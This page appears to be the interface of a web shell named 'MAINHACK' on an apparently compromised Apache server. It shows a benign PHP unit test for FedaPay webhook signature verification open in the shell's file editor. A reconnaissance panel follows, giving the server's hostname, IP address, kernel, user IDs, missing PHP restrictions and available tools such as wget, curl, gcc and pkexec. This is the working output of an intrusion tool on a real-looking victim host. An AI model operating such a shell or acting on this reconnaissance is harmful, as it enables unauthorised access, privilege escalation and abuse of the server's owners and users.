[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: WebhookTest.php
<?php namespace Tests; use FedaPay\Webhook; use FedaPay\WebhookSignature; class WebhookTest extends BaseTestCase { const EVENT_PAYLOAD = "{ \"id\": \"evt_test_webhook\", \"object\": \"event\" }"; const SECRET = "whsec_test_secret"; private function generateHeader($opts = []) { $timestamp = array_key_exists('timestamp', $opts) ? $opts['timestamp'] : time(); $payload = array_key_exists('payload', $opts) ? $opts['payload'] : self::EVENT_PAYLOAD; $secret = array_key_exists('secret', $opts) ? $opts['secret'] : self::SECRET; $scheme = array_key_exists('scheme', $opts) ? $opts['scheme'] : WebhookSignature::EXPECTED_SCHEME; $signature = array_key_exists('signature', $opts) ? $opts['signature'] : null; if ($signature === null) { $signedPayload = "$timestamp.$payload"; $signature = hash_hmac("sha256", $signedPayload, $secret); } return "t=$timestamp,$scheme=$signature"; } public function testValidJsonAndHeader() { $sigHeader = $this->generateHeader(); $event = Webhook::constructEvent(self::EVENT_PAYLOAD, $sigHeader, self::SECRET); $this->assertInstanceOf(\FedaPay\Event::class, $event); $this->assertEquals("evt_test_webhook", $event->id); } public function testInvalidJson() { $this->expectException('\UnexpectedValueException'); $payload = "this is not valid JSON"; $sigHeader = $this->generateHeader(["payload" => $payload]); Webhook::constructEvent($payload, $sigHeader, self::SECRET); } public function testValidJsonAndInvalidHeader() { $this->expectException('\FedaPay\Error\SignatureVerification'); $sigHeader = "bad_header"; Webhook::constructEvent(self::EVENT_PAYLOAD, $sigHeader, self::SECRET); } public function testMalformedHeader() { $this->expectException('\FedaPay\Error\SignatureVerification'); $this->expectExceptionMessage('Unable to extract timestamp and signatures from header'); $sigHeader = "i'm not even a real signature header"; WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET); } /** * @expectedException \FedaPay\Error\SignatureVerification * @expectedExceptionMessage No signatures found with expected scheme */ public function testNoSignaturesWithExpectedScheme() { $this->expectException('\FedaPay\Error\SignatureVerification'); $this->expectExceptionMessage('No signatures found with expected scheme'); $sigHeader = $this->generateHeader(["scheme" => "v0"]); WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET); } public function testNoValidSignatureForPayload() { $this->expectException('\FedaPay\Error\SignatureVerification'); $this->expectExceptionMessage('No signatures found matching the expected signature for payload'); $sigHeader = $this->generateHeader(["signature" => "bad_signature"]); WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET); } public function testTimestampTooOld() { $this->expectException('\FedaPay\Error\SignatureVerification'); $this->expectExceptionMessage('Timestamp outside the tolerance zone'); $sigHeader = $this->generateHeader(["timestamp" => time() - 15]); WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET, 10); } public function testTimestampTooRecent() { $this->expectException('\FedaPay\Error\SignatureVerification'); $this->expectExceptionMessage('Timestamp outside the tolerance zone'); $sigHeader = $this->generateHeader(["timestamp" => time() + 15]); WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET, 10); } public function testValidHeaderAndSignature() { $sigHeader = $this->generateHeader(); $this->assertTrue(WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET, 10)); } public function testHeaderContainsValidSignature() { $sigHeader = $this->generateHeader() . ",v1=bad_signature"; $this->assertTrue(WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET, 10)); } public function testTimestampOffButNoTolerance() { $sigHeader = $this->generateHeader(["timestamp" => 12345]); $this->assertTrue(WebhookSignature::verifyHeader(self::EVENT_PAYLOAD, $sigHeader, self::SECRET)); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.68 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002